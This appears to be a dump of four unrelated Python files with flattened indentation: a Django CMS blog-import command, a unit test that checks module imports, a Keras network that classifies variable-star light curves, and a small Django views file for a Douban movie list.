text = text.replace('<center>', '')
text = text.replace('</center>', '')
text = LIQUID_STRING.sub('\\1', text)
text = MKD_IMAGE.sub('<img src="\\2" alt="\\1"/>', text)
return text
def get_inner_html(tag):
return (tag.text or '') + ''.join(etree.tostring(e).decode('utf-8') for e in tag)
def get_text_for_node(n):
return ''.join(n.itertext())
def get_date(date_str):
if len(date_str) > 10:
naive = parse_datetime(date_str)
else:
naive = parse_datetime(date_str + 'T00:00:00')
if naive.tzinfo is None:
return pytz.timezone("Europe/Berlin").localize(naive, is_dst=None)
return naive
def remove_text(content):
tree_builder = html5lib.treebuilders.getTreeBuilder('dom')
parser = html5lib.html5parser.HTMLParser(tree=tree_builder)
dom = parser.parse(content)
def out(node):
if node.nodeType == node.TEXT_NODE:
return ''
return node.toxml()
return ''.join([out(y) for y in dom.getElementsByTagName('body')[0].childNodes])
def truncate_text(text):
return Truncator(strip_tags(text)).words(50)
def create_image_plugin(filename, image, parent_plugin, **kwargs):
"""
Used for drag-n-drop image insertion with djangocms-text-ckeditor.
Set TEXT_SAVE_IMAGE_FUNCTION='cmsplugin_filer_image.integrations.ckeditor.create_image_plugin' to enable.
"""
# from cmsplugin_filer_image.models import FilerImage
from djangocms_picture.models import Picture
from filer.models import Image
print(filename, kwargs)
image_plugin = Picture()
image_plugin.placeholder = parent_plugin.placeholder
image_plugin.parent = parent_plugin
image_plugin.position = CMSPlugin.objects.filter(parent=parent_plugin).count() + kwargs.get('counter', 0)
image_plugin.language = parent_plugin.language
image_plugin.plugin_type = 'PicturePlugin'
image_plugin.caption_text = kwargs.get('caption', '')
if 'filer_image' in kwargs:
image_model = kwargs['filer_image']
else:
image.seek(0)
image_model = Image.objects.create(
name=kwargs.get('caption', ''),
description=kwargs.get('description', ''),
file=SimpleUploadedFile(name=filename, content=image.read())
)
image_plugin.picture = image_model
image_plugin.save()
return image_plugin
class Command(BaseCommand):
help = "import_blog <directory>"
def add_arguments(self, parser):
parser.add_argument('directory', type=str)
parser.add_argument('slug', nargs='?', type=str)
def handle(self, *args, **options):
translation.activate(settings.LANGUAGE_CODE)
self.author_cache = None
self.SITE = Site.objects.get_current()
self.filer_folder = {}
self.image_cache = {}
directory = options['directory']
do_slug = options.get('slug', '')
self.directory = directory
filenames = itertools.chain(
glob.glob(os.path.join(directory, '**/*.html')),
glob.glob(os.path.join(directory, '**/*.markdown')),
glob.glob(os.path.join(directory, '**/*.md'))
)
for item in self.get_posts(filenames):
if do_slug and do_slug != item['slug']:
continue
logging.info(u'Processing: %s\n', item['title'])
link = item.pop('link')
author = item.pop('author')
meta = item['meta']
old_slug = item['slug']
date = item['date']
slug = slugify(old_slug)
lang = item['language']
with transaction.atomic():
posts = Post.objects.language(lang).translated(slug=slug)
if posts:
post = posts[0]
created = False
else:
post = Post.objects.language(lang).create(**{
'author': author,
'date_created': date,
'date_modified': date,
'date_published': date if item['published'] else None,
'publish': item['published'],
'enable_comments': False,
'app_config_id': 1,
'title': item['title'],
'slug': slug,
'post_text': item['content']
})
created = True
post.sites.add(self.SITE)
if created:
logging.info(u'Creating: %s\n', item['title'])
add_plugin(post.content, 'TextPlugin',
settings.LANGUAGE_CODE, body=post.post_text)
print('Fixing', item['title'], item['slug'])
self.fix_text_plugin(post, entry_content=item['content'])
post.save()
if old_slug != slug:
red, created = Redirect.objects.get_or_create(
site=self.SITE,
old_path='/blog/%s/%s/' % (date.year, slug),
new_path=post.get_absolute_url()
)
if meta.get('redirect_from'):
red, created = Redirect.objects.get_or_create(
site=self.SITE,
old_path='/blog/' + meta.get('redirect_from'),
new_path='/blog/' + link
)
def get_posts(self, filenames):
for filename in filenames:
yield self.get_post(filename)
def get_post(self, filename):
with open(filename) as f:
content = f.read()
_, meta, html = content.split(YAML_SEPARATOR)
meta = yaml.load(meta)
basename = os.path.basename(filename)
basename = basename.split('.')[0]
parts = basename.split('-')
date = get_date('-'.join(parts[:3]))
slug = '-'.join(parts[3:])
link = '%s/%s/' % (date.year, slug)
if 'date' in meta:
date = get_date(meta['date'])
if filename.endswith(('markdown', 'md')):
html = markdown.markdown(html)
return {
'meta': meta,
'title': meta['title'],
'link': link,
'slug': slug,
'date': date,
'language': settings.LANGUAGE_CODE,
'content': clean_content(html),
'published': meta.get('published', True),
'author': self.get_author(meta.get('author', None)),
}
def get_author(self, name):
if name is None:
return None
first_name, last_name = name.split(' ', 1)
users = User.objects.filter(
first_name=first_name,
last_name=last_name
)
if not users:
return None
return users[0]
def get_image(self, image_url):
resp = requests.get(image_url)
if resp.status_code != 200:
print('Warning: %s does not exist' % image_url)
return None
img_tmp = NamedTemporaryFile(delete=False)
img_tmp.write(resp.content)
img_tmp.flush()
img_tmp.close()
filename = os.path.basename(image_url)
return File(open(img_tmp.name, 'rb'), name=filename)
def get_filer_image(self, image_url=None, file_obj=None,
name='', description=''):
if image_url is not None:
file_obj = self.get_image(image_url)
if file_obj is None:
return None
return Image.objects.create(
name=name,
description=description,
original_filename=os.path.basename(file_obj.name),
file=SimpleUploadedFile(name=file_obj.name, content=file_obj.read())
)
def fix_text_plugin(self, entry, entry_content=None):
placeholder = entry.content
plugins = placeholder.get_plugins()
for plugin in plugins:
if plugin.plugin_type != 'TextPlugin':
continue
changed = False
text_plugin = plugin.djangocms_text_ckeditor_text
# content = text_plugin.body
content = entry_content
cleaned_content = clean_content(content)
if cleaned_content != content:
changed = True
content = cleaned_content
if not content:
continue
dom = etree.fromstring(content, etree.HTMLParser())
for script in dom.xpath('.//script'):
script.getparent().remove(script)
abstract = None
strongs = dom.xpath('.//strong')
if len(strongs):
abstract = get_inner_html(strongs[0])
strongs[0].getparent().remove(strongs[0])
changed = self.fix_images(plugin, dom, entry) or changed
if changed:
content = ''.join([etree.tostring(n, pretty_print=True).decode('utf-8')
for n in dom.xpath('.//body/*')
])
content = content.strip()
entry.post_text = content
if abstract is not None:
entry.abstract = abstract
text_plugin.body = content
text_plugin.save()
def fix_images(self, plugin, dom, entry):
found = False
CMSPlugin.objects.filter(parent=plugin, plugin_type='PicturePlugin').delete()
for counter, img in enumerate(dom.xpath('//img')):
src = img.attrib['src']
alt = img.attrib.get('alt') or ''
imgid = img.attrib.get('id')
logging.info("Extracting image %s: %s", imgid, src)
print('image src', src)
# if img.getparent().tag == 'a':
# link = img.getparent()
# link.getparent().replace(link, img)
if imgid is not None and imgid.startswith('plugin_obj_'):
plugin_id = imgid.rsplit('_', 1)[0]
plugin_id
continue
found = True
image_plugin = None
filer_image = None
if src.startswith('http'):
file_obj = self.get_image(src)
if file_obj is not None:
filer_image = self.get_filer_image(
file_obj=file_obj,
name=alt
)
else:
src_part = src.split('/')[-1].lower()
filer_images = Image.objects.filter(file__endswith=src_part)
if not filer_images:
if src.startswith('/'):
src_part = src[1:]
print('trying import from local folder')
image_file = os.path.join(self.directory, '..', src_part)
if os.path.exists(image_file):
with open(image_file, 'rb') as file_obj:
filer_image = self.get_filer_image(
file_obj=file_obj,
name=alt
)
print('import success')
else:
print('image not found at', image_file)
else:
print('Could not find image', src_part)
else:
filer_image = filer_images[0]
if not entry.main_image:
entry.main_image = filer_image
img.getparent().remove(img)
else:
image_plugin = create_image_plugin(
None, None,
filer_image=filer_image,
parent_plugin=plugin,
caption=alt,
description=src,
counter=counter
)
if image_plugin:
# render the new html for the plugin
new_img_html = plugin_to_tag(image_plugin)
# Get single image element
new_img = etree.HTML(new_img_html).xpath('.//cms-plugin')[0]
img.getparent().replace(img, new_img)
return found
|
'''
testimports.py
Copyright (C) 2013 Liam Deacon
MIT License (see LICENSE file for details)
Test Imports - checks whether key modules and extensions can be imported
'''
import sys,os
import unittest
def isimportable(package, module):
"""
Determine whether module is importable from given package
Returns
-------
bool : Result is True if import is successful
"""
try:
sys.stderr.write('Testing import of %s... ' %module)
sys.stderr.flush()
exec('from %s import %s' %(package, module))
sys.stderr.write('SUCCESS\n')
sys.stderr.flush()
return True
except ImportError as e:
sys.stderr.write('FAILED\n')
sys.stderr.flush()
print(e)
return False
imports={'phaseshifts':['libphsh', 'conphas', 'atorb']}
class Test(unittest.TestCase):
""" Test class for imports """
def testimports(self):
""" Function to determine if modules in packages are importable
Returns
-------
FailsIf : any module cannot be imported from a given package
"""
for packages in imports:
sys.stderr.write('Inspecting package: %s\n' %packages)
successes = [imp for imp in imports.get(packages)
if isimportable('phaseshifts', imp)]
self.failIf(len(successes) < len(imports.get(packages)))
sys.stderr.write('Failed to import %i out of %i modules\n\n'
%(len(imports.get(packages))-len(successes),
len(imports.get(packages))))
sys.stderr.flush()
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testimports']
sys.stderr.write('======================================================================\n')
sys.stderr.write('TESTING: %s\n' %os.path.basename(__file__))
sys.stderr.write('======================================================================\n')
unittest.main()
|
# coding: utf-8
from keras.callbacks import EarlyStopping, TensorBoard
from keras.layers import Input, Concatenate, Conv1D
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.models import Model
from keras.utils.training_utils import multi_gpu_model
from sklearn.model_selection import StratifiedKFold, train_test_split
from tqdm import tqdm
import numpy as np
import pandas as pd
import glob, os, random
import argparse
# Construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-g", "--gpus", type=int, default=1,
help="# of GPUs to use for training")
args = vars(ap.parse_args())
# grab the number of GPUs and store it in a conveience variable
num_gpu = args["gpus"]
## Settings
# Files Setting
limit = 8000 # Maximum amount of Star Per Class Per Survey
extraRandom = True
permutation = True # Permute Files
BALANCE_DB = True # Balance or not
maximum = 5
# Mini Settings
MAX_NUMBER_OF_POINTS = 500
NUMBER_OF_POINTS = 500
n_splits = 10
validation_set = 0.2
# Iterations
step = 250
# Network Settings
verbose = True
batch_size = 2056
dropout = 0.5
hidden_dims = 128
epochs = 100
# Convolutions
filters = 128
filters2 = 64
kernel_size = 50
kernel_size2 = 50
# Paths
NombreCarpeta = '10Fold'
base_path = '/mnt/nas2/GrimaRepo/claguirre/Dataset/'
regular_exp = base_path + 'Subclasses/Corot/**/*.csv'
regular_exp2 = base_path + 'Subclasses/**/OGLE-*.dat'
regular_exp3 = base_path + 'Subclasses/VVV/**/*.csv'
## Open Databases
subclasses = ['cepDiez', 'cepEfe', 'RRab', 'RRc', 'nonEC', 'EC', 'Mira', 'SRV', 'Osarg']
# subclasses = ['lpv','cep','rrlyr','ecl']
def get_filename(directory, N, early, activation='relu'):
if activation == 'relu':
directory += '/relu/'
elif activation == 'sigmoid':
directory += '/sigmoid/'
else:
directory += '/tanh/'
if not os.path.exists(directory):
print('[+] Creando Directorio \n\t ->', directory)
os.mkdir(directory)
name = '1) Red ' + str(N)
directory += '/'
return directory, name
def get_files(extraRandom = False, permutation=False):
files1 = np.array(list(glob.iglob(regular_exp, recursive=True)))
files2 = np.array(list(glob.iglob(regular_exp2, recursive=True)))
files3 = np.array(list(glob.iglob(regular_exp3, recursive=True)))
print('[!] Files in Memory')
# Permutations
if permutation:
files1 = files1[np.random.permutation(len(files1))]
files2 = files2[np.random.permutation(len(files2))]
files3 = files3[np.random.permutation(len(files3))]
print('[!] Permutation applied')
aux_dic = {}
corot = {}
vvv = {}
ogle = {}
for subclass in subclasses:
aux_dic[subclass] = []
corot[subclass] = 0
vvv[subclass] = 0
ogle[subclass] = 0
new_files = []
for idx in tqdm(range(len(files2))):
foundCorot = False
foundVista = False
foundOgle = False
for subclass in subclasses:
# Corot
if not foundCorot and corot[subclass] < limit and idx < len(files1) and subclass in files1[idx]:
new_files += [[files1[idx], 0]]
corot[subclass] += 1
foundCorot = True
# Ogle
if not foundOgle and ogle[subclass] < limit and subclass in files2[idx]:
new_files += [[files2[idx], 0]]
ogle[subclass] += 1
foundOgle = True
# VVV
if not foundVista and vvv[subclass] < limit and idx < len(files3) and subclass in files3[idx]:
new_files += [[files3[idx], 0]]
vvv[subclass] += 1
foundVista = True
del files1, files2, files3
print('[!] Loaded Files')
return new_files
def replicate_by_survey(files, yTrain):
surveys = ["OGLE", "VVV", "Corot"]
new_files = []
for s in surveys:
mask = [ s in i for i in yTrain]
auxYTrain = yTrain[mask]
new_files += replicate(files[mask])
return new_files
def replicate(files):
aux_dic = {}
for subclass in subclasses:
aux_dic[subclass] = []
for file, num in files:
for subclass in subclasses:
if subclass in file:
aux_dic[subclass].append([file, num])
break
new_files = []
for subclass in subclasses:
array = aux_dic[subclass]
length = len(array)
if length == 0:
continue
new_files += array
if length < limit and extraRandom:
count = 1
q = limit // length
for i in range(1, min(q, maximum)):
for file, num in array:
new_files += [[file, count]]
count += 1
r = limit - q*length
if r > 1:
new_files += [[random.choice(array)[0], count] for i in range(r)]
return new_files
def get_survey(path):
if 'Corot' in path:
return 'Corot'
elif 'VVV' in path:
return 'VVV'
elif 'OGLE' in path:
return 'OGLE'
else:
return 'err'
def get_name(path):
for subclass in subclasses:
if subclass in path:
return subclass
return 'err'
def get_name_with_survey(path):
for subclass in subclasses:
if subclass in path:
survey = get_survey(path)
return survey + '_' + subclass
return 'err'
def open_vista(path, num):
df = pd.read_csv(path, comment='#', sep=',')
df = df[df.mjd > 0]
df = df.sort_values(by=[df.columns[1]])
# 3 Desviaciones Standard
#df = df[np.abs(df.mjd-df.mjd.mean())<=(3*df.mjd.std())]
time = np.array(df[df.columns[1]].values, dtype=float)
magnitude = np.array(df[df.columns[2]].values, dtype=float)
error = np.array(df[df.columns[3]].values, dtype=float)
# Not Nan
not_nan = np.where(~np.logical_or(np.isnan(time), np.isnan(magnitude)))[0]
time = time[not_nan]
magnitude = magnitude[not_nan]
error = error[not_nan]
# Num
step = random.randint(1, 2)
count = random.randint(0, num)
time = time[::step]
magnitude = magnitude[::step]
error = error[::step]
time = time[count:]
magnitude = magnitude[count:]
error = error[count:]
# Get Name of Class
# folder_path = os.path.dirname(os.path.dirname(os.path.dirname(path)))
# path, folder_name = os.path.split(folder_path)
return time.astype('float'), magnitude.astype('float'), error.astype('float')
def open_corot(path, num, n, columns):
df = pd.read_csv(path, comment='#', sep=',')
df = df[df.DATEBARTT > 0]
df = df.sort_values(by=[df.columns[columns[0]]])
# 3 Desviaciones Standard
#df = df[np.abs(df.mjd-df.mjd.mean())<=(3*df.mjd.std())]
time = np.array(df[df.columns[columns[0]]].values, dtype=float)
magnitude = np.array(df[df.columns[columns[1]]].values, dtype=float)
error = np.array(df[df.columns[columns[2]]].values, dtype=float)
# Not Nan
not_nan = np.where(~np.logical_or(np.isnan(time), np.isnan(magnitude)))[0]
time = time[not_nan]
magnitude = magnitude[not_nan]
error = error[not_nan]
# Num
step = random.randint(1, 2)
count = random.randint(0, num)
time = time[::step]
magnitude = magnitude[::step]
error = error[::step]
time = time[count:]
magnitude = magnitude[count:]
error = error[count:]
if len(time) > n:
time = time[:n]
magnitude = magnitude[:n]
error = error[:n]
# Get Name of Class
# folder_path = os.path.dirname(os.path.dirname(path))
# path, folder_name = os.path.split(folder_path)
return time, magnitude, error
def open_ogle(path, num, n, columns):
df = pd.read_csv(path, comment='#', sep='\s+', header=None)
df.columns = ['a','b','c']
df = df[df.a > 0]
df = df.sort_values(by=[df.columns[columns[0]]])
# Erase duplicates if it exist
df.drop_duplicates(subset='a', keep='first')
# 3 Desviaciones Standard
#df = df[np.abs(df.mjd-df.mjd.mean())<=(3*df.mjd.std())]
time = np.array(df[df.columns[columns[0]]].values, dtype=float)
magnitude = np.array(df[df.columns[columns[1]]].values, dtype=float)
error = np.array(df[df.columns[columns[2]]].values, dtype=float)
# Not Nan
not_nan = np.where(~np.logical_or(np.isnan(time), np.isnan(magnitude)))[0]
time = time[not_nan]
magnitude = magnitude[not_nan]
error = error[not_nan]
# Num
step = random.randint(1, 2)
count = random.randint(0, num)
time = time[::step]
magnitude = magnitude[::step]
error = error[::step]
time = time[count:]
magnitude = magnitude[count:]
error = error[count:]
if len(time) > n:
time = time[:n]
magnitude = magnitude[:n]
error = error[:n]
# Get Name of Class
# folder_path = os.path.dirname(os.path.dirname(os.path.dirname(path)))
# path, folder_name = os.path.split(folder_path)
return time, magnitude, error
# Data has the form (Points,(Delta Time, Mag, Error)) 1D
def create_matrix(data, N):
aux = np.append([0], np.diff(data).flatten())
# Padding with cero
if max(N-len(aux),0) > 0:
aux = np.append(aux, [0]*(N-len(aux)))
return np.array(aux[:N], dtype='float').reshape(-1,1)
def dataset(files, N):
input_1 = []
input_2 = []
yClassTrain = []
survey = []
for file, num in tqdm(files):
num = int(num)
t, m, e, c, s = None, None, None, get_name(file), get_survey(file)
if c in subclasses:
if 'Corot' in file:
if 'EN2_STAR_CHR' in file:
t, m, e = open_corot(file, num, N, [0,4,8])
else:
t, m, e = open_corot(file, num, N, [0,1,2])
elif 'VVV' in file:
t, m, e = open_vista(file, num)
elif 'OGLE' in file:
t, m, e = open_ogle(file, num, N, [0,1,2])
if c in subclasses:
input_1.append(create_matrix(t, N))
input_2.append(create_matrix(m, N))
yClassTrain.append(c)
survey.append(s)
else:
print('\t [!] E2 No paso el archivo: ', file, '\n\t\t - Clase: ', c)
else:
print('\t [!] E1 No paso el archivo: ', file, '\n\t\t - Clase: ', c)
return np.array(input_1), np.array(input_2), np.array(yClassTrain), np.array(survey)
## Keras Model
def get_model(N, classes, activation='relu'):
conv1 = Conv1D(filters, kernel_size, activation='relu')
conv2 = Conv1D(filters2, kernel_size2, activation='relu')
# For Time Tower
input1 = Input((N, 1))
out1 = conv1(input1)
out1 = conv2(out1)
# For Magnitude Tower
input2 = Input((N, 1))
out2 = conv1(input2)
out2 = conv2(out2)
out = Concatenate()([out1, out2])
out = Flatten()(out)
out = Dropout(dropout)(out)
out = Dense(hidden_dims, activation=activation)(out)
out = Dropout(dropout)(out)
out = Dense(len(classes), activation='softmax')(out)
model = Model([input1, input2], out)
return model
def class_to_vector(Y, classes):
new_y = []
for y in Y:
aux = []
for val in classes:
if val == y:
aux.append(1)
else:
aux.append(0)
new_y.append(aux)
return np.array(new_y)
def serialize_model(name, model):
# Serialize model to JSON
model_json = model.to_json()
with open(name + '.json', "w") as json_file:
json_file.write(model_json)
# Serialize weights to HDF5
model.save_weights(name + ".h5")
def experiment(directory, files, Y, classes, N, n_splits):
# Iterating
activations = ['tanh']
earlyStopping = [False]
for early in earlyStopping:
for activation in activations:
# try:
print('\t\t [+] Entrenando',
'\n\t\t\t [!] Early Stopping', early,
'\n\t\t\t [!] Activation', activation)
direc, name = get_filename(directory, N,
early, activation)
filename_exp = direc + name
yPred = np.array([])
yReal = np.array([])
sReal = np.array([])
modelNum = 0
skf = StratifiedKFold(n_splits=n_splits)
for train_index, test_index in skf.split(files, Y):
dTrain, dTest = files[train_index], files[test_index]
yTrain = Y[train_index]
##############
### Get DB ###
##############
# Replicate Files
dTrain = replicate_by_survey(dTrain, yTrain)
# Get Database
dTrain_1, dTrain_2, yTrain, _ = dataset(dTrain, N)
dTest_1, dTest_2, yTest, sTest = dataset(dTest, N)
yReal = np.append(yReal, yTest)
sReal = np.append(sReal, sTest)
yTrain = class_to_vector(yTrain, classes)
yTest = class_to_vector(yTest, classes)
################
## Tensorboard #
################
tensorboard = TensorBoard(log_dir= direc + 'logs',
write_graph=True, write_images=False)
################
## Model ##
################
callbacks = [tensorboard]
if early:
earlyStopping = EarlyStopping(monitor='val_loss', patience=3,
verbose=0, mode='auto')
callbacks.append(earlyStopping)
if num_gpu <= 1:
print("[!] Training with 1 GPU")
model = get_model(N, classes, activation)
else:
print("[!] Training with", str(num_gpu), "GPUs")
# We'll store a copy of the model on *every* GPU and then combine
# the results from the gradient updates on the CPU
with tf.device("/cpu:0"):
model = get_model(N, classes, activation)
# Make the model parallel
model = multi_gpu_model(model, gpus=num_gpu)
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
model.fit([dTrain_1, dTrain_2], yTrain,
batch_size=batch_size * num_gpu, epochs=epochs,
validation_split=validation_set, verbose=1,
callbacks=callbacks)
yPred = np.append(yPred, np.argmax(model.predict([dTest_1, dTest_2]), axis=1))
#################
## Serialize ##
#################
modelDirectory = direc + 'model/'
if not os.path.exists(modelDirectory):
print('[+] Creando Directorio \n\t ->', modelDirectory)
os.mkdir(modelDirectory)
serialize_model(modelDirectory + str(modelNum), model)
modelNum += 1
del dTrain, dTest, yTrain, yTest, model
# break
yPred = np.array([classes[int(i)] for i in yPred])
# Save Matrix
print('\n \t\t\t [+] Saving Results in', filename_exp)
np.save(filename_exp, [yReal, yPred, sReal])
print('*'*30)
# except Exception as e:
# print('\t\t\t [!] Fatal Error:\n\t\t', str(e))
print('[+] Obteniendo Filenames')
files = np.array(get_files(extraRandom, permutation))
YSubClass = []
for file, num in files:
YSubClass.append(get_name_with_survey(file))
YSubClass = np.array(YSubClass)
NUMBER_OF_POINTS = 500
while NUMBER_OF_POINTS <= MAX_NUMBER_OF_POINTS:
# Create Folder
directory = './Resultados' + NombreCarpeta
if not os.path.exists(directory):
print('[+] Creando Directorio \n\t ->', directory)
os.mkdir(directory)
experiment(directory, files, YSubClass, subclasses, NUMBER_OF_POINTS, n_splits)
NUMBER_OF_POINTS += step
|
from django.shortcuts import render,render_to_response
from django.http import HttpResponse
from . import models
# Create your views here.
def render404(request):
return HttpResponse("404")
def render500(request):
return HttpResponse("500")
def index(request):
moives = models.douban_top250.objects.all()
page=request.GET.get('page')
if page==None:
page=1
return render(request, 'html/index.html', {'moives': moives[:25],'page':int(page)})
else:
return render(request,'html/index.html',{'moives':moives[(int(page)-1)*25:(int(page)-1)*25+25],'page':int(page)})
def moive_info(request,movie_id):
moive=models.douban_top250.objects.get(pk=movie_id)
return render(request,'html/moive.html',{'moive':moive}) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.